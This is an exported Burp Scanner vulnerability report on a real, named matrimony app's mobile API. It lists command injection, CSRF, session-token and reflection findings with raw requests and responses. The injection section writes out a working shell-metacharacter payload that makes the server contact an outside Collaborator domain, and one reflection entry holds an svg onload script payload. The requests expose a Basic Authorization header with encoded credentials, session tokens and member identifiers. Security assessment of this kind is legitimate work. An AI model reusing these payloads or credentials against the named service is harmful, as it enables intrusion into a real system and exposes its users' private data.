BM Scan Report

Burp Scanner Report
Summary
The table below shows the numbers of issues identified in different categories. Issues are classified according to severity as
High, Medium, Low or Information. This reflects the likely impact of each issue for a typical organization. Issues are also
classified according to confidence as Certain, Firm or Tentative. This reflects the inherent reliability of the technique that
was used to identify the issue.
Confidence
Certain Firm Tentative Total
High 1 0 0 1
Medium 0 6 5 11
Severity
Low 1 0 0 1
Information 43 0 0 43
The chart below shows the aggregated numbers of issues identified in each category. Solid coloured bars represent
issues with a confidence level of Certain, and the bars fade as the confidence level falls.
Contents
1. OS command injection
2. Cross-site request forgery
2.1. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.php
2.2. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php
2.3. https://apps.bharatmatrimony.com/applogin/loginwithdet.php
2.4. https://apps.bharatmatrimony.com/applogin/logout.php
2.5. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php
3. Session token in URL
3.1. https://apps.bharatmatrimony.com/appei/appspromos.php
3.5. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php
4. Strict transport security not enforced
5. Input returned in response (reflected)
5.1. https://apps.bharatmatrimony.com/apicommhistory/communicationhistory.php [URL path filename]
5.2. https://apps.bharatmatrimony.com/apicommhistory/communicationhistory.php [name of an arbitrarily supplied URL parameter]
5.3. https://apps.bharatmatrimony.com/appassuredcontact/getphoneprivacy.php [URL path filename]
5.4. https://apps.bharatmatrimony.com/appassuredcontact/getphoneprivacy.php [name of an arbitrarily supplied URL parameter]
5.5. https://apps.bharatmatrimony.com/appdaily6/yettobeviewed.php [URL path filename]
5.6. https://apps.bharatmatrimony.com/appdaily6/yettobeviewed.php [name of an arbitrarily supplied URL parameter]
5.7. https://apps.bharatmatrimony.com/appdynamicarray/appdynamicpopulate.php [URL path filename]
5.8. https://apps.bharatmatrimony.com/appdynamicarray/appdynamicpopulate.php [name of an arbitrarily supplied URL parameter]
5.9. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.php [URL path filename]
5.10. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.php [name of an arbitrarily supplied URL parameter]
5.11. https://apps.bharatmatrimony.com/appeditprofile/appeditprofile.php [URL path filename]
5.12. https://apps.bharatmatrimony.com/appeditprofile/appeditprofile.php [name of an arbitrarily supplied URL parameter]
5.13. https://apps.bharatmatrimony.com/appeditprofile/appownprofile.php [URL path filename]
5.14. https://apps.bharatmatrimony.com/appeditprofile/appownprofile.php [name of an arbitrarily supplied URL parameter]
5.15. https://apps.bharatmatrimony.com/appei/appspromos.php [URL path filename]
5.16. https://apps.bharatmatrimony.com/appei/appspromos.php [name of an arbitrarily supplied URL parameter]
5.17. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php [URL path filename]
5.18. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php [name of an arbitrarily supplied URL parameter]
5.19. https://apps.bharatmatrimony.com/applogin/getDeviceInfo.php [URL path filename]
5.20. https://apps.bharatmatrimony.com/applogin/getDeviceInfo.php [name of an arbitrarily supplied URL parameter]
5.21. https://apps.bharatmatrimony.com/applogin/loginwithdet.php [URL path filename]
5.22. https://apps.bharatmatrimony.com/applogin/loginwithdet.php [name of an arbitrarily supplied URL parameter]
5.23. https://apps.bharatmatrimony.com/applogin/logout.php [URL path filename]
5.24. https://apps.bharatmatrimony.com/applogin/logout.php [name of an arbitrarily supplied URL parameter]
5.25. https://apps.bharatmatrimony.com/appmemberhome/memstats.php [URL path filename]
5.26. https://apps.bharatmatrimony.com/appmemberhome/memstats.php [name of an arbitrarily supplied URL parameter]
5.27. https://apps.bharatmatrimony.com/appphoto/enlargephoto.php [URL path filename]
5.28. https://apps.bharatmatrimony.com/appphoto/enlargephoto.php [name of an arbitrarily supplied URL parameter]
5.29. https://apps.bharatmatrimony.com/appphoto/enlargephotodisplay.php [URL path filename]
5.30. https://apps.bharatmatrimony.com/appphoto/enlargephotodisplay.php [name of an arbitrarily supplied URL parameter]
5.31. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php [URL path filename]
5.32. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php [name of an arbitrarily supplied URL parameter]
5.33. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php [URL path filename]
5.34. https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php [name of an arbitrarily supplied URL parameter]
5.35. https://apps.bharatmatrimony.com/appsuccess/successstory.php [URL path filename]
5.36. https://apps.bharatmatrimony.com/appsuccess/successstory.php [name of an arbitrarily supplied URL parameter]
5.37. https://apps.bharatmatrimony.com/appunified/appinboxui.php [URL path filename]
5.38. https://apps.bharatmatrimony.com/appunified/appinboxui.php [name of an arbitrarily supplied URL parameter]
5.39. https://apps.bharatmatrimony.com/appunified/viewcalldetails.php [URL path filename]
5.40. https://apps.bharatmatrimony.com/appunified/viewcalldetails.php [name of an arbitrarily supplied URL parameter]
6. Email addresses disclosed
6.2. https://apps.bharatmatrimony.com/appmemberhome/memstats.php
7. SSL certificate
1. OS command injection
Next
Summary
Severity: High
Confidence: Certain
Host: https://apps.bharatmatrimony.com
Path: /applogin/loginwithdet.php
Issue detail
The APPTYPE parameter appears to be vulnerable to OS command injection attacks. It is possible to use various shell
metacharacters to inject arbitrary OS commands. The command output does not appear to be returned in the application's
responses. However, it is possible to cause the application to interact with an external domain, to verify that a command was
executed.
The payload &nslookup -q=cname 7ckkyriz6bb2uav470vckw622t8uwpkh77vw.burpcollaborator.net .&'\"`0&nslookup

-q=cname 7ckkyriz6bb2uav470vckw622t8uwpkh77vw.burpcollaborator.net.&`' was submitted in the APPTYPE parameter. The
application performed a DNS lookup for the specified domain name.
Issue background
Operating system command injection vulnerabilities arise when an application incorporates user-controllable data into a
command that is processed by a shell command interpreter. If the user data is not strictly validated, an attacker can use
shell metacharacters to modify the command that is executed, and inject arbitrary further commands that will be executed
by the server.
OS command injection vulnerabilities are usually very serious and may lead to compromise of the server hosting the
application, or of the application's own data and functionality. It may also be possible to use the server as a platform for
attacks against other systems. The exact potential for exploitation depends upon the security context in which the
command is executed, and the privileges that this context has regarding sensitive resources on the server.
Issue remediation
If possible, applications should avoid incorporating user-controllable data into operating system commands. In almost
every situation, there are safer alternative methods of performing server-level tasks, which cannot be manipulated to
perform additional commands than the one intended.
If it is considered unavoidable to incorporate user-supplied data into operating system commands, the following two layers
of defense should be used to prevent attacks:
· The user data should be strictly validated. Ideally, a whitelist of specific accepted values should be used.
Otherwise, only short alphanumeric strings should be accepted. Input containing any other data, including any
conceivable shell metacharacter or whitespace, should be rejected.
· The application should use command APIs that launch a specific process via its name and command-line
parameters, rather than passing a command string to a shell interpreter that supports command chaining and
redirection. For example, the Java API Runtime.exec and the ASP.NET API Process.Start do not support shell
metacharacters. This defense can mitigate the impact of an attack even in the event that an attacker
circumvents the input validation defenses.
Vulnerability classifications
· CWE-77: Improper Neutralization of Special Elements used in a Command ('Command Injection')
· CWE-78: Improper Neutralization of Special Elements used in an OS Command ('OS Command Injection')
· CWE-116: Improper Encoding or Escaping of Output
Request
POST /applogin/loginwithdet.php HTTP/1.1
Host: apps.bharatmatrimony.com
Content-Type: application/x-www-form-urlencoded; charset=utf-8
Accept: */*
Connection: close
Accept-Encoding: gzip, deflate
User-Agent: bharatmatrimony/4.6 (com.consim.bharatMatrimony; build:1.0; iOS 13.1.3) Alamofire/4.9.0
Accept-Language: en-IN;q=1.0, ta-IN;q=0.9
Content-Length: 611
Authorization: Basic YXBwc2FkbWluOkE3amdQanVL
APPTYPE=101%26nslookup%20-q%3dcname%207ckkyriz6bb2uav470vckw622t8uwpkh77vw.burpcollaborator.net.%26'%5c
%22%600%26nslookup%20-q%3dcname%207ckkyriz6bb2uav470vckw622t8uwpkh77vw.burpcollaborator.net.
%26%60'&APPVERSION=4.6&APPVERSIONCODE=192&CN=IN&DEVICEDET=%7B%22DEVICE%22%3A%22iPhone%206S%22%2C
%22SERIAL%22%3A%22%22%2C%22LINE_NUMBER%22%3A%22%22%2C%22SIM_OP_NAME%22%3A%22AirTel%22%2C
%22ISO_COUNTRY_CODE%22%
...[SNIP]...
Response
HTTP/1.1 200 OK
Server: Apache
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Content-Length: 6235
Content-Type: application/json
Date: Tue, 19 May 2020 17:26:20 GMT
Connection: close
Vary: Accept-Encoding
{"RESPONSECODE":"1","ERRCODE":"0","TOTALIDS":"1","SYSTEMDATE":"2020-05-19 22:56:19","MEMBERSTATSPHOTO":
{"PHOTOAVAILABLE":"Y","PHOTOPROTECTED":"N"},"PROFILEIDS":{"PROFILEID":[{"MATRIID":"M6651646","S
...[SNIP]...
Collaborator DNS interaction

The Collaborator server received a DNS lookup of type CNAME for the domain name
7ckkyriz6bb2uav470vckw622t8uwpkh77vw.burpcollaborator.net.
The lookup was received from IP address 115.112.200.200 at 2020-May-19 17:26:19 UTC.
2. Cross-site request forgery

Previous Next
There are 5 instances of this issue:
· /appdynamicarray/appgetarrayversion.php
· /applogin/appgetcountryip.php
· /applogin/loginwithdet.php
· /applogin/logout.php
· /appsearch/appcurltrack.php
Issue background
Cross-site request forgery (CSRF) vulnerabilities may arise when applications rely solely on HTTP cookies to identify the user
that has issued a particular request. Because browsers automatically add cookies to requests regardless of their origin, it
may be possible for an attacker to create a malicious web site that forges a cross-domain request to the vulnerable
application. For a request to be vulnerable to CSRF, the following conditions must hold:
· The request can be issued cross-domain, for example using an HTML form. If the request contains non-
standard headers or body content, then it may only be issuable from a page that originated on the same
domain.
· The application relies solely on HTTP cookies or Basic Authentication to identify the user that issued the
request. If the application places session-related tokens elsewhere within the request, then it may not be
vulnerable.
· The request performs some privileged action within the application, which modifies the application's state
based on the identity of the issuing user.
· The attacker can determine all the parameters required to construct a request that performs the action. If the
request contains any values that the attacker cannot determine or predict, then it is not vulnerable.
Issue remediation
The most effective way to protect against CSRF vulnerabilities is to include within relevant requests an additional token
that is not transmitted in a cookie: for example, a parameter in a hidden form field. This additional token should contain
sufficient entropy, and be generated using a cryptographic random number generator, such that it is not feasible for an
attacker to determine or predict the value of any token that was issued to another user. The token should be associated
with the user's session, and the application should validate that the correct token is received before performing any action
resulting from the request.
An alternative approach, which may be easier to implement, is to validate that Host and Referrer headers in relevant
requests are both present and contain the same domain name. However, this approach is somewhat less robust:
historically, quirks in browsers and plugins have often enabled attackers to forge cross-domain requests that manipulate
these headers to bypass such defences.
References
· Using Burp to Test for Cross-Site Request Forgery
· The Deputies Are Still Confused
· CWE-352: Cross-Site Request Forgery (CSRF)
2.1. https://apps.bharatmatrimony.com/appdynamicarray/appgetarrayversion.php
Next
Summary
Severity: Medium
Confidence: Tentative
Path: /appdynamicarray/appgetarrayversion.php
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against authenticated users.
The original request contains parameters that look like they may be anti-CSRF tokens. However the request is
successful if these parameters are removed.
Request
POST /appdynamicarray/appgetarrayversion.php HTTP/1.1
Accept: */*
Connection: close
Content-Length: 102
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=5fbe33bcdfa07a4ad90bd52308ace7fb1&ID=&OUTPUTTYPE=2
Response
HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Length: 150
Date: Tue, 19 May 2020 15:46:17 GMT
Connection: close
{"RESPONSECODE":"1","ERRCODE":"0","VERSIONDET":
{"RELIGIONLIST":"1","MOTHERTONGUELIST":"1","CASTELIST":"1","ALTERNATECASTELIST":"1","COUNTRYLIST":"1"}}
2.2. https://apps.bharatmatrimony.com/applogin/appgetcountryip.php
Previous Next
Summary
Severity: Medium
Path: /applogin/appgetcountryip.php
Issue detail
Request
POST /applogin/appgetcountryip.php HTTP/1.1
Accept: */*
Connection: close
Content-Length: 72
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&OUTPUTTYPE=2&SDBMATRID=104
Response
HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Length: 55
Date: Tue, 19 May 2020 15:46:17 GMT
Connection: close
{"RESPONSECODE":"1","ERRCODE":"0","IPCOUNTRYCODE":"IN"}
Previous Next
Summary
Severity: Medium
Issue detail
The original request contains parameters that look like they may be anti-CSRF tokens. However the request is
Request
Accept: */*
Connection: close
Content-Length: 611
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&CN=IN&DEVICEDET=%7B%22DEVICE%22%3A%22iPhone%206S%22%2C
%22ISO_COUNT
...[SNIP]...
22%2C%22OP_NAME%22%3A%22%22%2C%22MANUFACTURER%22%3A%22Apple
%22%7D&FRMLOGIN=1&ID=KSWDmXnCsyLfYL2smrF49Q%3D
%3D&NOTIFIYDET=1~1~1~1~1~1~1&OUTPUTTYPE=2&PASSWORD=7N8eX6EhU48C5dU7s1TIIA%3D
%3D&REFINESEARCH=1&REGISTERID=34732bb190ef99c64953069b41ef8ba025236e27b164b3b17454fe26618a2ce5&SEARCHRANDO
MPROMO=1&ltype=1
Response
HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Date: Tue, 19 May 2020 15:46:21 GMT
Connection: close
...[SNIP]...
2.4. https://apps.bharatmatrimony.com/applogin/logout.php
Previous Next
Summary
Severity: Medium
Path: /applogin/logout.php
Issue detail
The original request contains parameters that look like they may be anti-CSRF tokens. However, the request is
Request
POST /applogin/logout.php HTTP/1.1
Accept: */*
Connection: close
Content-Length: 159
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=c172431a4936377805ed7b9fdee61cd53&ID=M6651646&OUTPUT
TYPE=2&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Length: 36
Date: Tue, 19 May 2020 15:46:20 GMT
Connection: close
{"RESPONSECODE":"1","ERRCODE":"0"}
2.5. https://apps.bharatmatrimony.com/appsearch/appcurltrack.php
Previous Next
Summary
Severity: Medium
Path: /appsearch/appcurltrack.php
Issue detail
The request appears to be vulnerable to cross-site request forgery (CSRF) attacks against authenticated
users.
Request
POST /appsearch/appcurltrack.php HTTP/1.1
Accept: */*
Connection: close
Content-Length: 51
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=&regdata=
Response
HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Content-Length: 0
Content-Type: text/html; charset=UTF-8
Date: Tue, 19 May 2020 16:15:04 GMT
Connection: close
3. Session token in URL
Previous Next
· /appei/appspromos.php
· /appsearch/appwhoviewedprofile.php
· /appsearch/appwhoviewedprofile.php
Issue background
Sensitive information within URLs may be logged in various locations, including the user's browser, the web server, and any
forward or reverse proxy servers between the two endpoints. URLs may also be displayed on-screen, bookmarked or
emailed around by users. They may be disclosed to third parties via the Referrer header when any off-site links are
followed. Placing session tokens into the URL increases the risk that they will be captured by an attacker.
Issue remediation
Applications should use an alternative mechanism for transmitting session tokens, such as HTTP cookies or hidden fields in
forms that are submitted using the POST method.
· CWE-200: Information Exposure
· CWE-384: Session Fixation
· CWE-598: Information Exposure Through Query Strings in GET Request
Summary
Severity: Medium
Confidence: Firm
Path: /appei/appspromos.php
Issue detail
The URL in the request appears to contain a session token within the query string:
· https://apps.bharatmatrimony.com/appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=63e52ffb4625ec622ad67f56
b79d7f2e5&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192
Request
GET /appei/appspromos.php?
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=63e52ffb4625ec622ad67f56b79d7f2e5&
TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192 HTTP/1.1
Connection: close
Accept: */*
Response
HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Date: Tue, 19 May 2020 12:24:11 GMT
Connection: close
{"RESPONSECODE":"1","ERRORCODE":"0","ALLCOMMCNT":"4","TOTALREC":"1","RECORDLIST":[{"PROFILE":
{"PROFILESTATUS":"0","PHONEVERIFIED":"Y","AGE":"24","HEIGHT":"5 Ft 11 In \/ 180 Cms","EDUCATION":"","OCCU
...[SNIP]...
Previous Next
Summary
Severity: Medium
Confidence: Firm
Issue detail
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=0a66cd1c6ed8276b5bf4eef4
413bc96e1&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192
Request
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=0a66cd1c6ed8276b5bf4eef4413bc96e1&
Connection: close
Accept: */*
Response
HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Date: Tue, 19 May 2020 12:35:59 GMT
Connection: close
...[SNIP]...
Previous Next
Summary
Severity: Medium
Confidence: Firm
Issue detail
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=04f8dc1093dd3ec4f2e4c1bd
9393cdaa4&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192
Request
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=04f8dc1093dd3ec4f2e4c1bd9393cdaa4&
Connection: close
Accept: */*
Response
HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Date: Tue, 19 May 2020 15:37:01 GMT
Connection: close
...[SNIP]...
Previous Next
Summary
Severity: Medium
Confidence: Firm
Issue detail
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=1e3edd6071d0eb091e7a257
11511fe2a7&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192
Request
&LOGINGEN=M&APPTYPE=101&APPVERSION=4.6&OUTPUTTYPE=2&ID=M6651646&ENCID=1e3edd6071d0eb091e7a25711511fe2a7
&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192 HTTP/1.1
Connection: close
Accept: */*
Response
HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Date: Tue, 19 May 2020 15:41:28 GMT
Connection: close
...[SNIP]...
Previous Next
Summary
Severity: Medium
Confidence: Firm
Path: /appsearch/appwhoviewedprofile.php
Issue detail
· https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php?
SDBMATRIID=M6651646&OUTPUTTYPE=2&APPTYPE=101&APPVERSION=4.6&PIINFO=27~165.10000610352~98~47~3~0
~3~1017~0~0~2~1~2~98~31~0~0~3116~3~2404~3~3~9~1~3~4~1~M~F~1589895554~~~~~~~~1~0~3~1~0~0~3~N~0~1~0
~1~1~3~472~79~https://m-
imgs.matrimonycdn.com/photos/2019/09/30/15/M6651646_IMXiF_4692_TL.jpg~1,12,16,26,23,21&LOGINGEN=M&DEVI
CEDET=&USERTIMEDET=1589902649&DOS=27&Lang=en&LOGINTYPE=F&MID=M6651646&ENCID=82518c062044e155fc
e5b3980c0e28c60&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192&GENDER=M&ST
LIMIT=0&RECCNT=20
Request
GET /appsearch/appwhoviewedprofile.php?
SDBMATRIID=M6651646&OUTPUTTYPE=2&APPTYPE=101&APPVERSION=4.6&PIINFO=27~165.10000610352~98~47~3~0~3~1017~0~
0~2~1~2~98~31~0~0~3116~3~2404~3~3~9~1~3~4~1~M~F~1589895554~~~~~~~~1~0~3~1~0~0~3~N~0~1~0~1~1~3~472~79~https://
m-
imgs.matrimonycdn.com/photos/2019/09/30/15/M6651646_IMXiF_4692_TL.jpg~1,12,16,26,23,21&LOGINGEN=M&DEVICEDET=&US
ERTIMEDET=1589902649&DOS=27&Lang=en&LOGINTYPE=F&MID=M6651646&ENCID=82518c062044e155fce5b3980c0e28c60&TOK
ENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192&GENDER=M&STLIMIT=0&RECCNT=20 HTTP/1.1
Connection: close
Accept: */*
Response
HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Date: Tue, 19 May 2020 15:37:32 GMT
Connection: close
{"RESPONSECODE":"1","ERRCODE":"0","TOTALRESULTS":"42","MATCHINGCOUNT":"8","REMAININGDAYS":"100","SEARCHRES":
{"PROFILE":[{"PROFILESTATUS":"0","MATRIID":"M6257665","NAME":"Vasutha","AGE":"24","GENDER"
...[SNIP]...
Previous Next
Summary
Severity: Medium
Confidence: Firm
Issue detail
· https://apps.bharatmatrimony.com/appsearch/appwhoviewedprofile.php?
SDBMATRIID=M6651646&OUTPUTTYPE=2&APPTYPE=101&APPVERSION=4.6&PIINFO=27~165.10000610352~98~47~3~0
~3~1017~0~0~2~1~2~98~31~0~0~3116~3~2404~3~3~9~1~3~4~1~M~F~1589895554~~~~~~~~1~0~3~1~0~0~3~N~0~1~0
~1~1~3~472~79~https://m-
imgs.matrimonycdn.com/photos/2019/09/30/15/M6651646_IMXiF_4692_TL.jpg~1,12,16,26,23,21&LOGINGEN=M&DEVI
CEDET=&USERTIMEDET=1589902771&DOS=27&Lang=en&LOGINTYPE=F&MID=M6651646&ENCID=02ff975d1149526a01
c1cfcf7f39321a8&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192&SDBMATRID=M6
651646&STLIMIT=0&RECCNT=20&GENDER=M&INAPPIDS=M6257665,E5321603&CONTACTED=0&VIEWED=0&LOGINGEN
=M&FROMINAPP=1&USERTIMEDET=1589902771&SHORTLISTED=0&LOGINTYPE=F&STLIMIT=0&RECCNT=20
Request
GET /appsearch/appwhoviewedprofile.php?
0~2~1~2~98~31~0~0~3116~3~2404~3~3~9~1~3~4~1~M~F~1589895554~~~~~~~~1~0~3~1~0~0~3~N~0~1~0~1~1~3~472~79~https://
m-
ERTIMEDET=1589902771&DOS=27&Lang=en&LOGINTYPE=F&MID=M6651646&ENCID=02ff975d1149526a01c1cfcf7f39321a8&TOKEN
ID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1&APPVERSIONCODE=192&SDBMATRID=M6651646&STLIMIT=0&RECCNT=20&GE
NDER=M&INAPPIDS=M6257665,E5321603&CONTACTED=0&VIEWED=0&LOGINGEN=M&FROMINAPP=1&USERTIMEDET=1589902771
&SHORTLISTED=0&LOGINTYPE=F&STLIMIT=0&RECCNT=20 HTTP/1.1
Connection: close
Accept: */*
Response
HTTP/1.1 200 OK
Server: Apache
Pragma: no-cache
Date: Tue, 19 May 2020 15:39:33 GMT
Connection: close
{"RESPONSECODE":"1","ERRCODE":"0","TOTALRESULTS":"2","MATCHINGCOUNT":"2","REMAININGDAYS":"100","SEARCHRES":
{"PROFILE":[{"PROFILESTATUS":"0","MATRIID":"M6257665","NAME":"Vasutha","AGE":"24","GENDER":
...[SNIP]...
4. Strict transport security not enforced

Previous Next
Summary
Severity: Low
Confidence: Certain
Path: /
Issue description
The application fails to prevent users from connecting to it over unencrypted connections. An attacker able to modify a
legitimate user's network traffic could bypass the application's use of SSL/TLS encryption, and use the application as a
platform for attacks against its users. This attack is performed by rewriting HTTPS links as HTTP, so that if a targeted user
follows a link to the site from an HTTP page, their browser never attempts to use an encrypted connection. The sslstrip tool
automates this process.
To exploit this vulnerability, an attacker must be suitably positioned to intercept and modify the victim's network traffic.
This scenario typically occurs when a client communicates with the server over an insecure connection such as public Wi-Fi,
or a corporate or home network that is shared with a compromised computer. Common defences such as switched
networks are not sufficient to prevent this. An attacker situated in the user's ISP or the application's hosting infrastructure
could also perform this attack. Note that an advanced adversary could potentially target any connection made over the
Internet's core infrastructure.
Issue remediation
The application should instruct web browsers to only access the application using HTTPS. To do this, enable HTTP Strict
Transport Security (HSTS) by adding a response header with the name 'Strict-Transport-Security' and the value 'max-
age=expireTime', where expireTime is the time in seconds that browsers should remember that the site should only be
accessed using HTTPS. Consider adding the 'includeSubDomains' flag if appropriate.
Note that because HSTS is a "trust on first use" (TOFU) protocol, a user who has never accessed the application will never
have seen the HSTS header, and will therefore still be vulnerable to SSL stripping attacks. To mitigate this risk, you can
optionally add the 'preload' flag to the HSTS header, and submit the domain for review by browser vendors.
References
· HTTP Strict Transport Security
· sslstrip
· HSTS Preload Form
· CWE-523: Unprotected Transport of Credentials
5. Input returned in response (reflected)
Previous Next
· /apicommhistory/communicationhistory.php [URL path filename]

· /apicommhistory/communicationhistory.php [name of an arbitrarily supplied URL parameter]
· /appassuredcontact/getphoneprivacy.php [URL path filename]
· /appassuredcontact/getphoneprivacy.php [name of an arbitrarily supplied URL parameter]
· /appdaily6/yettobeviewed.php [URL path filename]
· /appdaily6/yettobeviewed.php [name of an arbitrarily supplied URL parameter]
· /appdynamicarray/appdynamicpopulate.php [URL path filename]
· /appdynamicarray/appdynamicpopulate.php [name of an arbitrarily supplied URL parameter]
· /appdynamicarray/appgetarrayversion.php [URL path filename]
· /appdynamicarray/appgetarrayversion.php [name of an arbitrarily supplied URL parameter]
· /appeditprofile/appeditprofile.php [URL path filename]
· /appeditprofile/appeditprofile.php [name of an arbitrarily supplied URL parameter]
· /appeditprofile/appownprofile.php [URL path filename]
· /appeditprofile/appownprofile.php [name of an arbitrarily supplied URL parameter]
· /appei/appspromos.php [URL path filename]
· /appei/appspromos.php [name of an arbitrarily supplied URL parameter]
· /applogin/appgetcountryip.php [URL path filename]
· /applogin/appgetcountryip.php [name of an arbitrarily supplied URL parameter]
· /applogin/getDeviceInfo.php [URL path filename]
· /applogin/getDeviceInfo.php [name of an arbitrarily supplied URL parameter]
· /applogin/loginwithdet.php [URL path filename]
· /applogin/loginwithdet.php [name of an arbitrarily supplied URL parameter]
· /applogin/logout.php [URL path filename]
· /applogin/logout.php [name of an arbitrarily supplied URL parameter]
· /appmemberhome/memstats.php [URL path filename]
· /appmemberhome/memstats.php [name of an arbitrarily supplied URL parameter]
· /appphoto/enlargephoto.php [URL path filename]
· /appphoto/enlargephoto.php [name of an arbitrarily supplied URL parameter]
· /appphoto/enlargephotodisplay.php [URL path filename]
· /appphoto/enlargephotodisplay.php [name of an arbitrarily supplied URL parameter]
· /appsearch/appcurltrack.php [URL path filename]
· /appsearch/appcurltrack.php [name of an arbitrarily supplied URL parameter]
· /appsearch/appwhoviewedprofile.php [URL path filename]
· /appsearch/appwhoviewedprofile.php [name of an arbitrarily supplied URL parameter]
· /appsuccess/successstory.php [URL path filename]
· /appsuccess/successstory.php [name of an arbitrarily supplied URL parameter]
· /appunified/appinboxui.php [URL path filename]
· /appunified/appinboxui.php [name of an arbitrarily supplied URL parameter]
· /appunified/viewcalldetails.php [URL path filename]
· /appunified/viewcalldetails.php [name of an arbitrarily supplied URL parameter]
Issue background
Reflection of input arises when data is copied from a request and echoed into the application's immediate response.
Input being returned in application responses is not a vulnerability in its own right. However, it is a prerequisite for many
client-side vulnerabilities, including cross-site scripting, open redirection, content spoofing, and response header injection.
Additionally, some server-side vulnerabilities such as SQL injection are often easier to identify and exploit when input is
returned in responses. In applications where input retrieval is rare and the environment is resistant to automated testing
(for example, due to a web application firewall), it might be worth subjecting instances of it to focused manual testing.
· CWE-20: Improper Input Validation
· CWE-116: Improper Encoding or Escaping of Output
5.1. https://apps.bharatmatrimony.com/apicommhistory/communicationhistory.
php [URL path filename]
Previous Next
Summary
Severity: Information
Confidence: Certain
Path: /apicommhistory/communicationhistory.php
Issue detail
The value of the URL path filename is copied into the application's response.
Request
POST /apicommhistory/communicationhistory.php0pspdc49sf HTTP/1.1
Accept: */*
Connection: close
Content-Length: 179
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=02ff975d1149526a01c1cfcf7f39321a8&ID=M6651646&OUTPUTTY
PE=2&RECEIVERID=B2678847&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
HTTP/1.1 404 Not Found
Server: Apache
Content-Length: 247
Content-Type: text/html; charset=iso-8859-1
Date: Tue, 19 May 2020 16:12:49 GMT
Connection: close
<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">

<html><head>
<title>404 Not Found</title>
</head><body>
<h1>Not Found</h1>
<p>The requested URL /apicommhistory/communicationhistory.php0pspdc49sf was not found on this server.</p>
...[SNIP]...
5.2. https://apps.bharatmatrimony.com/apicommhistory/communicationhistory.
php [name of an arbitrarily supplied URL parameter]
Previous Next
Summary
Confidence: Certain
Path: /apicommhistory/communicationhistory.php
Issue detail
The name of an arbitrarily supplied URL parameter is copied into the application's response.
Request
POST /apicommhistory/communicationhistory.php/'%22%3e%3csvg%2fonload%3d(new(Image)).src%3d'%2f
%2f1acewlgt459ws4ty5ut6iq4w0n6du5kteg64v%5c56burpcollaborator.net'%3e HTTP/1.1
Accept: */*
Connection: close
Content-Length: 179
APPTYPE=101&APPVERSION=4.6&APPVERSIONCODE=192&ENCID=02ff975d1149526a01c1cfcf7f39321a8&ID=M6651646&OUTPUTTY
PE=2&RECEIVERID=B2678847&TOKENID=131c6f8396a2071562a9b7c10e0bdf143b87a5c1
Response
Server: Apache
Content-Length: 349
Date: Tue, 19 May 2020 16:16:07 GMT
Connection: close

<html><head>
</head><body>
<h1>Not Found</h1>
<p>The requested URL
/apicommhistory/communicationhistory.php/'"><svg/onload=(new(Image)).src='//1acewlgt459ws4ty5ut6iq4w0n6du5kte
g64v\56burpcollaborator.net'> was not found on this server.</p>
...[SNIP]...
5.3. https://apps.bharatmatrimony.com/appassuredcontact/getphoneprivacy.ph
p [URL path filename]
Previous Next
Summary
Confidence: Certain
